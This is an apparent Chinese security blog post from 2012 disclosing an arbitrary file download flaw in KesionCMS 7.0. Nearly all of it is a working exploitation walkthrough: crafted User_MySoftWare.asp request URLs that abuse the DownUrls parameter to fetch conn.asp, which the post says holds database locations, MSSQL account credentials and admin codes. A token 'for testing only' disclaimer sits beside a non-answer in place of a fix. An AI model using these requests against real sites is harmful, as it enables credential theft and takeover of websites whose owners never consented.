您的位置 » 首页 » 实用工具 » kesioncms7.0最新版本任意下载漏洞

kesioncms7.0最新版本任意下载漏洞

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年10月03日 | 文章热度:4,570 次 全屏阅读

显示不全请点击全屏阅读

版本:90sec
说明:请用于漏洞安全测试,请勿非法利用
修复方案:我想官方会懂的

漏洞检测方法:
先注册个用户登陆,然后访问http://www.xxx.net/user/Contributor.asp 可以看到几个可以投稿的分类,选择个软件投稿.点下一步!

然后会跳到:www.2cto.com /user/User_MySoftWare.asp?action=Add&channelid=3&ClassID=20102479005271(这个ClassID不同的站可能会不一样)

然后在把地址输入:www.2cto.com /user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID=20102479005271(上面的ClassID)&Title=aa&DownUrls=/admin63.net.asp(要下载的文件路径。)

输入好后就会发布一个标题为aa的软件投稿可以在www.2cto.com /user/User_ItemInfo.asp?ChannelID=3 看到 发布的投稿。

打开发布的aa投稿,然后会出现下载截面直接点下载就可以下载到conn.asp这个文件了,一般数据库地址,或者mssql 数据帐户 后台安全码等等 都会记录在里面!

由于时间晚了,我就随便说下咯,大概利用就是刚才我说的那样,漏洞放手里半年了,有兴趣的可以去研究下

Tags:

kesioncms7.0漏洞, 科讯CMS漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1027/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)